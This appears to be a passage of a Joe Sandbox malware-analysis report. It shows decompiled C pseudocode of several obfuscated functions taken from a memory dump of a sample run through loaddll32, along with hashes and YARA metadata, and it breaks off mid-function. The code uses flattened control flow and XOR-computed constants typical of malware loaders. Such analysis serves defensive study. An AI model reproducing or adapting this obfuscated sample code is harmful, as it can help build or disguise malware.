                                                                                                          			E02AF654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _v88;
				char* _v92;
				char* _v96;
				signed int _v100;
				char _v104;
				char _v624;
				char _v1144;
				void* _t168;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t168);
				_v48 = 0xcd00f6;
				_v48 = _v48 + 0xcd83;
				_v48 = _v48 ^ 0x09b3856c;
				_v48 = _v48 ^ 0x097e4b14;
				_v68 = 0x47ecc1;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x0000069b;
				_v56 = 0x5623e4;
				_t204 = 0x5e;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x07a7b883;
				_v60 = 0x9f93bd;
				_v60 = _v60 ^ 0x1b2b58cc;
				_v60 = _v60 ^ 0x1bb3b428;
				_v36 = 0x1947a4;
				_v36 = _v36 | 0x7bdfb0e1;
				_v36 = _v36 ^ 0x7bdfc232;
				_v52 = 0x76ccb;
				_v52 = _v52 * 0x2b;
				_v52 = _v52 ^ 0x7f6a3668;
				_v52 = _v52 ^ 0x7e52560e;
				_v24 = 0x419396;
				_v24 = _v24 / _t204;
				_t205 = 0x46;
				_v24 = _v24 * 0x57;
				_v24 = _v24 ^ 0x845af85c;
				_v24 = _v24 ^ 0x84646483;
				_v16 = 0xd7b9b6;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x000408e3;
				_v44 = 0x89b89f;
				_v44 = _v44 * 0x1b;
				_v44 = _v44 / _t205;
				_v44 = _v44 ^ 0x00329adc;
				_v40 = 0x7c911;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0x9fb7bc96;
				_v40 = _v40 ^ 0x9fbb58de;
				_v32 = 0x2960c2;
				_v32 = _v32 >> 0xd;
				_t206 = 0x3b;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x000737d7;
				_v8 = 0x50758c;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 / _t206;
				_v8 = _v8 + 0xffffa1a5;
				_v8 = _v8 ^ 0x002c6c3d;
				_v72 = 0xae2241;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x0004039d;
				_v28 = 0x59a91e;
				_v28 = _v28 * 0x35;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 + 0x675a;
				_v28 = _v28 ^ 0x00026f30;
				_v64 = 0xf7748e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 ^ 0x3526d747;
				_v20 = 0x936b67;
				_v20 = _v20 + 0xffff21a6;
				_v20 = _v20 + 0x6733;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x0025db68;
				_v12 = 0x60291e;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0xffff2f3b;
				_v12 = _v12 ^ 0xbff2968b;
				E02AFFE2A(_v60, _v36, 0x1e,  &_v104);
				E02AFFE2A(_v52, _v24, 0x208,  &_v624);
				E02AFFE2A(_v16, _v44, 0x208,  &_v1144);
				E02AEE204(_v40, _v32,  &_v624, _a4);
				E02AEE204(_v8, _v72,  &_v1144, _a12);
				_v100 = _v48;
				_v96 =  &_v624;
				_v92 =  &_v1144;
				_v88 = _v56 | _v68 | 0x00000410;
				_t200 = E02AEE4F8( &_v104, _v28, _v64, _v20, _v12);
				asm("sbb eax, eax");
				return  ~_t200 + 1;
			}
































                                                                                                          0x02af6554
                                                                                                          0x02af6557
                                                                                                          0x02af655a
                                                                                                          0x02af655d
                                                                                                          0x02af655e
                                                                                                          0x02af655f
                                                                                                          0x02af6564
                                                                                                          0x02af656d
                                                                                                          0x02af6574
                                                                                                          0x02af657b
                                                                                                          0x02af6582
                                                                                                          0x02af6589
                                                                                                          0x02af658d
                                                                                                          0x02af6594
                                                                                                          0x02af65a1
                                                                                                          0x02af65a4
                                                                                                          0x02af65a7
                                                                                                          0x02af65ab
                                                                                                          0x02af65b2
                                                                                                          0x02af65b9
                                                                                                          0x02af65c0
                                                                                                          0x02af65c7
                                                                                                          0x02af65ce
                                                                                                          0x02af65d5
                                                                                                          0x02af65dc
                                                                                                          0x02af65e7
                                                                                                          0x02af65ea
                                                                                                          0x02af65f1
                                                                                                          0x02af65f8
                                                                                                          0x02af6606
                                                                                                          0x02af660d
                                                                                                          0x02af6610
                                                                                                          0x02af6613
                                                                                                          0x02af661a
                                                                                                          0x02af6621
                                                                                                          0x02af6628
                                                                                                          0x02af662c
                                                                                                          0x02af6630
                                                                                                          0x02af6634
                                                                                                          0x02af663b
                                                                                                          0x02af6646
                                                                                                          0x02af6650
                                                                                                          0x02af6653
                                                                                                          0x02af665a
                                                                                                          0x02af6661
                                                                                                          0x02af6665
                                                                                                          0x02af666c
                                                                                                          0x02af6673
                                                                                                          0x02af667a
                                                                                                          0x02af6682
                                                                                                          0x02af6683
                                                                                                          0x02af6686
                                                                                                          0x02af668d
                                                                                                          0x02af6698
                                                                                                          0x02af66a0
                                                                                                          0x02af66a3
                                                                                                          0x02af66aa
                                                                                                          0x02af66b1
                                                                                                          0x02af66b8
                                                                                                          0x02af66bc
                                                                                                          0x02af66c3
                                                                                                          0x02af66ce
                                                                                                          0x02af66d1
                                                                                                          0x02af66d5
                                                                                                          0x02af66dc
                                                                                                          0x02af66e3
                                                                                                          0x02af66ee
                                                                                                          0x02af66f4
                                                                                                          0x02af66fb
                                                                                                          0x02af6702
                                                                                                          0x02af6709
                                                                                                          0x02af6710
                                                                                                          0x02af6714
                                                                                                          0x02af671b
                                                                                                          0x02af6722
                                                                                                          0x02af6729
                                                                                                          0x02af672d
                                                                                                          0x02af6734
                                                                                                          0x02af6744
                                                                                                          0x02af675c
                                                                                                          0x02af676f
                                                                                                          0x02af6784
                                                                                                          0x02af6799
                                                                                                          0x02af67a4
                                                                                                          0x02af67ad
                                                                                                          0x02af67b6
                                                                                                          0x02af67ca
                                                                                                          0x02af67d4
                                                                                                          0x02af67de
                                                                                                          0x02af67e5

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: =l,$#V
                                                                                                          • API String ID: 0-882995766
                                                                                                          • Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
                                                                                                          • Instruction ID: 2c2746ed151eae4b3fd09665ff4777e2d238ba693085b182934858955dc5a5c5
                                                                                                          • Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
                                                                                                          • Instruction Fuzzy Hash: 1A81E0B1D0120DABCF08CFE0DA8A8EEBBB5FF44308F208159E515B6250D7B55A49CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF07F4, Relevance: 2.6, Strings: 2, Instructions: 113COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AF07F4() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _t88;
				intOrPtr _t89;
				void* _t96;
				signed int _t101;
				signed int _t112;
				short* _t113;
				signed int* _t116;

				_t116 =  &_v552;
				_v548 = 0x5918d1;
				_v548 = _v548 + 0xe8d9;
				_t96 = 0x413edd5;
				_v548 = _v548 * 7;
				_v548 = _v548 | 0xf342c850;
				_v548 = _v548 ^ 0xf3753354;
				_v544 = 0x3961e1;
				_t112 = 0x6c;
				_v544 = _v544 * 0x6e;
				_v544 = _v544 * 0x7b;
				_v544 = _v544 ^ 0xd8b8e625;
				_v528 = 0xb40301;
				_v528 = _v528 ^ 0x18f013f2;
				_v528 = _v528 + 0xffff1b00;
				_v528 = _v528 ^ 0x184a596c;
				_v532 = 0x9ab5ff;
				_v532 = _v532 + 0x870f;
				_v532 = _v532 + 0xffff8f3e;
				_v532 = _v532 ^ 0x0099ca27;
				_v524 = 0x5ab638;
				_v524 = _v524 + 0xffff3304;
				_v524 = _v524 ^ 0x005bd322;
				_v536 = 0x9f91e6;
				_t113 = _v524;
				_v536 = _v536 / _t112;
				_v536 = _v536 >> 2;
				_v536 = _v536 ^ 0x000cbfb4;
				_v540 = 0xcf5411;
				_t88 = _v540 * 0x37;
				_v540 = _t88;
				_v540 = _v540 ^ 0x69295e57;
				_v540 = _v540 ^ 0x45a0f7a2;
				L1:
				while(_t96 != 0x413edd5) {
					if(_t96 == 0x66ebf40) {
						_t88 = E02B00DB1(_v548,  &_v520, __eflags, _v544, _t96, _v528);
						_t116 =  &(_t116[3]);
						_t96 = 0xe87ba20;
						continue;
					}
					if(_t96 == 0x9062539) {
						_t89 =  *0x2b06214; // 0x0
						__eflags = _t89 + 0x23c;
						return E02AEE204(_v536, _v540, _t89 + 0x23c, _t113);
					}
					if(_t96 != 0xe87ba20) {
						L15:
						__eflags = _t96 - 0xf0f6a33;
						if(__eflags != 0) {
							continue;
						}
						return _t88;
					}
					_v552 = 0x64b67d;
					_t101 = 0x4d;
					_v552 = _v552 / _t101;
					_v552 = _v552 << 1;
					_v552 = _v552 + 0xa638;
					_v552 = _v552 ^ 0x000343e6;
					_t113 =  &_v520 + E02AF00C5( &_v520, _v532, _v524) * 2;
					while(1) {
						_t88 =  &_v520;
						if(_t113 <= _t88) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L8:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t74 =  &_v552;
						 *_t74 = _v552 - 1;
						__eflags =  *_t74;
						if( *_t74 == 0) {
							__eflags = _t113;
							L12:
							_t96 = 0x9062539;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t96 = 0x66ebf40;
				goto L15;
			}



















                                                                                                          0x02af07f4
                                                                                                          0x02af07fa
                                                                                                          0x02af0804
                                                                                                          0x02af080c
                                                                                                          0x02af081a
                                                                                                          0x02af0823
                                                                                                          0x02af0830
                                                                                                          0x02af083d
                                                                                                          0x02af084c
                                                                                                          0x02af084d
                                                                                                          0x02af0856
                                                                                                          0x02af085a
                                                                                                          0x02af0862
                                                                                                          0x02af086a
                                                                                                          0x02af0872
                                                                                                          0x02af087a
                                                                                                          0x02af0882
                                                                                                          0x02af088a
                                                                                                          0x02af0892
                                                                                                          0x02af089a
                                                                                                          0x02af08a2
                                                                                                          0x02af08aa
                                                                                                          0x02af08b2
                                                                                                          0x02af08ba
                                                                                                          0x02af08c8
                                                                                                          0x02af08cc
                                                                                                          0x02af08d0
                                                                                                          0x02af08d5
                                                                                                          0x02af08dd
                                                                                                          0x02af08e5
                                                                                                          0x02af08ea
                                                                                                          0x02af08ee
                                                                                                          0x02af08f6
                                                                                                          0x00000000
                                                                                                          0x02af08fe
                                                                                                          0x02af090c
                                                                                                          0x02af0998
                                                                                                          0x02af099d
                                                                                                          0x02af09a0
                                                                                                          0x00000000
                                                                                                          0x02af09a0
                                                                                                          0x02af0910
                                                                                                          0x02af09b7
                                                                                                          0x02af09c0
                                                                                                          0x00000000
                                                                                                          0x02af09d1
                                                                                                          0x02af0918
                                                                                                          0x02af09a9
                                                                                                          0x02af09a9
                                                                                                          0x02af09af
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af09af
                                                                                                          0x02af091e
                                                                                                          0x02af092e
                                                                                                          0x02af0935
                                                                                                          0x02af0939
                                                                                                          0x02af093d
                                                                                                          0x02af0945
                                                                                                          0x02af095f
                                                                                                          0x02af0973
                                                                                                          0x02af0973
                                                                                                          0x02af0979
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af0964
                                                                                                          0x02af0968
                                                                                                          0x02af0970
                                                                                                          0x02af0970
                                                                                                          0x02af0970
                                                                                                          0x00000000
                                                                                                          0x02af0970
                                                                                                          0x02af096a
                                                                                                          0x02af096a
                                                                                                          0x02af096a
                                                                                                          0x02af096e
                                                                                                          0x02af097d
                                                                                                          0x02af0980
                                                                                                          0x02af0980
                                                                                                          0x00000000
                                                                                                          0x02af0980
                                                                                                          0x00000000
                                                                                                          0x02af096e
                                                                                                          0x00000000
                                                                                                          0x02af097b
                                                                                                          0x02af09a7
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: W^)i$a9
                                                                                                          • API String ID: 0-1728637351
                                                                                                          • Opcode ID: edcfc7b57fb3413c749d85eee5fbb80599a7ea12795c274e61d95b6e1e6c77e6
                                                                                                          • Instruction ID: 50de99bf567d5842839170cc06f9a7a36b69cfdfe33803f77aa076d668f0b5a0
                                                                                                          • Opcode Fuzzy Hash: edcfc7b57fb3413c749d85eee5fbb80599a7ea12795c274e61d95b6e1e6c77e6
                                                                                                          • Instruction Fuzzy Hash: 0F4197715083018BD764CF60C58541FFBE1BBD4358F004A1EF6DAA6265EB749A09CF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF5333, Relevance: 2.6, Strings: 2, Instructions: 107COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E02AF5333(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t101;
				void* _t104;
				signed int _t105;
				signed int _t106;
				void* _t108;
				void* _t116;
				void* _t117;
				signed int* _t119;

				_t108 = __ecx;
				_t119 =  &_v40;
				_v16 = 0x92c19;
				_v16 = _v16 ^ 0x628de80f;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x84c9db68;
				_v4 = 0x30e06a;
				_v4 = _v4 ^ 0x4daac4de;
				_v4 = _v4 ^ 0x4d95dd20;
				_v20 = 0x313cca;
				_t105 = 0xc;
				_v20 = _v20 / _t105;
				_v20 = _v20 >> 9;
				_t116 = 0;
				_v20 = _v20 ^ 0x00013d87;
				_t117 = 0xe755a9f;
				_v40 = 0xb13641;
				_t106 = 0x59;
				_v40 = _v40 / _t106;
				_v40 = _v40 << 1;
				_v40 = _v40 | 0xaf38654a;
				_v40 = _v40 ^ 0xaf356b5c;
				_v24 = 0xb3ef74;
				_v24 = _v24 ^ 0x556457b4;
				_v24 = _v24 * 0x55;
				_v24 = _v24 ^ 0x80aa83de;
				_v28 = 0x9b3a5a;
				_v28 = _v28 + 0x3060;
				_v28 = _v28 + 0xffffd119;
				_v28 = _v28 ^ 0x00918c22;
				_v32 = 0x1265dc;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 | 0x6a7496c5;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x25b994ca;
				_v36 = 0xc9b3ee;
				_v36 = _v36 >> 5;
				_v36 = _v36 + 0x1e11;
				_v36 = _v36 << 3;
				_v36 = _v36 ^ 0x0035933c;
				_v8 = 0x402308;
				_v8 = _v8 ^ 0x846a3c70;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x2152b8ae;
				_v12 = 0xd9cdb9;
				_v12 = _v12 * 0x16;
				_v12 = _v12 | 0x05b8ac83;
				_v12 = _v12 ^ 0x17b93340;
				do {
					while(_t117 != 0xb1e0fe5) {
						if(_t117 == 0xb7b3e2e) {
							_t116 = _t116 + E02AFBE8C(_t108 + 0x18, _v32, _v36, _v8, _v12);
						} else {
							if(_t117 == 0xcf04418) {
								_t104 = E02AFBE8C(_t108, _v20, _v40, _v24, _v28);
								_t119 =  &(_t119[3]);
								_t117 = 0xb7b3e2e;
								_t116 = _t116 + _t104;
								continue;
							} else {
								if(_t117 != 0xe755a9f) {
									goto L8;
								} else {
									_t117 = 0xb1e0fe5;
									continue;
								}
							}
						}
						L11:
						return _t116;
					}
					_push(_t108);
					_t101 = E02AF07F0();
					_t119 =  &(_t119[1]);
					_t117 = 0xcf04418;
					_t116 = _t116 + _t101;
					L8:
				} while (_t117 != 0x795fd89);
				goto L11;
			}





















                                                                                                          0x02af5333
                                                                                                          0x02af5333
                                                                                                          0x02af5336
                                                                                                          0x02af5340
                                                                                                          0x02af5348
                                                                                                          0x02af534d
                                                                                                          0x02af5355
                                                                                                          0x02af535d
                                                                                                          0x02af5365
                                                                                                          0x02af536d
                                                                                                          0x02af537f
                                                                                                          0x02af5384
                                                                                                          0x02af538a
                                                                                                          0x02af538f
                                                                                                          0x02af5391
                                                                                                          0x02af5399
                                                                                                          0x02af539e
                                                                                                          0x02af53af
                                                                                                          0x02af53b7
                                                                                                          0x02af53bb
                                                                                                          0x02af53bf
                                                                                                          0x02af53c7
                                                                                                          0x02af53cf
                                                                                                          0x02af53d7
                                                                                                          0x02af53e4
                                                                                                          0x02af53e8
                                                                                                          0x02af53f0
                                                                                                          0x02af53f8
                                                                                                          0x02af5400
                                                                                                          0x02af5408
                                                                                                          0x02af5410
                                                                                                          0x02af5418
                                                                                                          0x02af541d
                                                                                                          0x02af5425
                                                                                                          0x02af542a
                                                                                                          0x02af5432
                                                                                                          0x02af543a
                                                                                                          0x02af543f
                                                                                                          0x02af5447
                                                                                                          0x02af544c
                                                                                                          0x02af5454
                                                                                                          0x02af545c
                                                                                                          0x02af5464
                                                                                                          0x02af5469
                                                                                                          0x02af5471
                                                                                                          0x02af547e
                                                                                                          0x02af5482
                                                                                                          0x02af548a
                                                                                                          0x02af5492
                                                                                                          0x02af5492
                                                                                                          0x02af5498
                                                                                                          0x02af5509
                                                                                                          0x02af549a
                                                                                                          0x02af54a0
                                                                                                          0x02af54be
                                                                                                          0x02af54c3
                                                                                                          0x02af54c6
                                                                                                          0x02af54c8
                                                                                                          0x00000000
                                                                                                          0x02af54a2
                                                                                                          0x02af54a8
                                                                                                          0x00000000
                                                                                                          0x02af54aa
                                                                                                          0x02af54aa
                                                                                                          0x00000000
                                                                                                          0x02af54aa
                                                                                                          0x02af54a8
                                                                                                          0x02af54a0
                                                                                                          0x02af550b
                                                                                                          0x02af5514
                                                                                                          0x02af5514
                                                                                                          0x02af54d4
                                                                                                          0x02af54d5
                                                                                                          0x02af54da
                                                                                                          0x02af54dd
                                                                                                          0x02af54e2
                                                                                                          0x02af54e4
                                                                                                          0x02af54e4
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `0$j0
                                                                                                          • API String ID: 0-1706687062
                                                                                                          • Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                                                                                                          • Instruction ID: 1420d9fe3cfc2711f58134aaeaff7a33539fa747826ad5cb038ea2efe08426e8
                                                                                                          • Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                                                                                                          • Instruction Fuzzy Hash: E14157728083019FC384DF21D98940BFBE2BBD8758F504E2DF99966260D3718A59CF97
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE7E79, Relevance: 2.6, Strings: 2, Instructions: 104COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02AE7E79(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t99;
				signed int _t101;
				void* _t105;
				signed int _t107;
				signed int _t108;
				char* _t109;
				intOrPtr* _t124;
				void* _t125;

				_t124 = __ecx;
				_v16 = 0xb54463;
				_v16 = _v16 + 0xffff3415;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffffe11b;
				_v16 = _v16 ^ 0xfff7a701;
				_v28 = 0xd77279;
				_v28 = _v28 | 0x400730c3;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xbb990da4;
				_v36 = 0xbcfff8;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000a6762;
				_v8 = 0xf31a9;
				_v8 = _v8 + 0xffff1e98;
				_v8 = _v8 ^ 0xb4a41066;
				_v8 = _v8 | 0xf0d45968;
				_v8 = _v8 ^ 0xf4f540ba;
				_v12 = 0xc524e1;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 5;
				_t107 = 0x45;
				_v12 = _v12 / _t107;
				_v12 = _v12 ^ 0x00048931;
				_v44 = 0x28a4d;
				_v44 = _v44 + 0x8441;
				_v44 = _v44 ^ 0x00037729;
				_v20 = 0x237a7e;
				_v20 = _v20 ^ 0x3c41f8ff;
				_v20 = _v20 | 0x4ede09cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x01f9a400;
				_v32 = 0xc1354c;
				_v32 = _v32 ^ 0xd017d736;
				_v32 = _v32 + 0xb685;
				_v32 = _v32 ^ 0xd0d9caff;
				_v24 = 0x1c6e66;
				_v24 = _v24 + 0xffff7553;
				_t108 = 0x67;
				_t109 =  &_v304;
				_v24 = _v24 / _t108;
				_v24 = _v24 ^ 0x000aa416;
				_v40 = 0xe04b7f;
				_v40 = _v40 ^ 0x3f01302b;
				_v40 = _v40 ^ 0x3feda652;
				while(1) {
					_t99 =  *_t124;
					if(_t99 == 0) {
						break;
					}
					if(_t99 == 0x2e) {
						 *_t109 = 0;
					} else {
						 *_t109 = _t99;
						_t109 = _t109 + 1;
						_t124 = _t124 + 1;
						continue;
					}
					L6:
					_t125 = E02AE801A(_v16,  &_v304, _v28);
					if(_t125 != 0) {
						L8:
						_t101 = E02AE3362(_t124 + 1, _v12, _v44);
						_push(_v40);
						_push(_v24);
						_push(_t101 ^ 0x31e3fec1);
						_push(_t125);
						return E02AEEC31(_v20, _v32);
					}
					_t105 = E02AE483C(_v36, _v8,  &_v304);
					_t125 = _t105;
					if(_t125 != 0) {
						goto L8;
					}
					return _t105;
				}
				goto L6;
			}






















                                                                                                          0x02ae7e84
                                                                                                          0x02ae7e86
                                                                                                          0x02ae7e8f
                                                                                                          0x02ae7e96
                                                                                                          0x02ae7e9a
                                                                                                          0x02ae7ea1
                                                                                                          0x02ae7ea8
                                                                                                          0x02ae7eaf
                                                                                                          0x02ae7eb6
                                                                                                          0x02ae7eba
                                                                                                          0x02ae7ec1
                                                                                                          0x02ae7ec8
                                                                                                          0x02ae7ecc
                                                                                                          0x02ae7ed3
                                                                                                          0x02ae7eda
                                                                                                          0x02ae7ee1
                                                                                                          0x02ae7ee8
                                                                                                          0x02ae7eef
                                                                                                          0x02ae7ef6
                                                                                                          0x02ae7efd
                                                                                                          0x02ae7f01
                                                                                                          0x02ae7f0a
                                                                                                          0x02ae7f0f
                                                                                                          0x02ae7f14
                                                                                                          0x02ae7f1b
                                                                                                          0x02ae7f22
                                                                                                          0x02ae7f29
                                                                                                          0x02ae7f30
                                                                                                          0x02ae7f37
                                                                                                          0x02ae7f3e
                                                                                                          0x02ae7f45
                                                                                                          0x02ae7f49
                                                                                                          0x02ae7f50
                                                                                                          0x02ae7f57
                                                                                                          0x02ae7f5e
                                                                                                          0x02ae7f65
                                                                                                          0x02ae7f6c
                                                                                                          0x02ae7f73
                                                                                                          0x02ae7f7d
                                                                                                          0x02ae7f80
                                                                                                          0x02ae7f86
                                                                                                          0x02ae7f89
                                                                                                          0x02ae7f90
                                                                                                          0x02ae7f97
                                                                                                          0x02ae7f9e
                                                                                                          0x02ae7faf
                                                                                                          0x02ae7faf
                                                                                                          0x02ae7fb3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae7fa9
                                                                                                          0x02ae7fb7
                                                                                                          0x02ae7fab
                                                                                                          0x02ae7fab
                                                                                                          0x02ae7fad
                                                                                                          0x02ae7fae
                                                                                                          0x00000000
                                                                                                          0x02ae7fae
                                                                                                          0x02ae7fba
                                                                                                          0x02ae7fcb
                                                                                                          0x02ae7fd0
                                                                                                          0x02ae7feb
                                                                                                          0x02ae7ff4
                                                                                                          0x02ae7ff9
                                                                                                          0x02ae8001
                                                                                                          0x02ae800a
                                                                                                          0x02ae800b
                                                                                                          0x00000000
                                                                                                          0x02ae8011
                                                                                                          0x02ae7fdf
                                                                                                          0x02ae7fe4
                                                                                                          0x02ae7fe9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae8019
                                                                                                          0x02ae8019
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: bg$~z#
                                                                                                          • API String ID: 0-3633068236
                                                                                                          • Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                                                                                                          • Instruction ID: d0ad7e2c2781386ff4199dd0847518d02911f015e1249ebd8526694a58dab387
                                                                                                          • Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                                                                                                          • Instruction Fuzzy Hash: 11414572C0021EDBDF19CFA4C9495EEFBB1AF55318F208199C452B6220D7B80B4ACFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF5515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: bWr$(8r
                                                                                                          • API String ID: 0-4034592896
                                                                                                          • Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                                                                                                          • Instruction ID: d26b4f0cba42615cb15d54e539489bb65aeff6b3ae1a0a439c04b50ea4e7651b
                                                                                                          • Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                                                                                                          • Instruction Fuzzy Hash: DA411471C00219EFCF58CFA4D98A9EEBBB5FB04304F20818AE511B6264D7B95B85CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFF840, Relevance: 1.5, Strings: 1, Instructions: 210COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02AFF840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t197;
				void* _t220;
				intOrPtr* _t230;
				void* _t232;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t255;
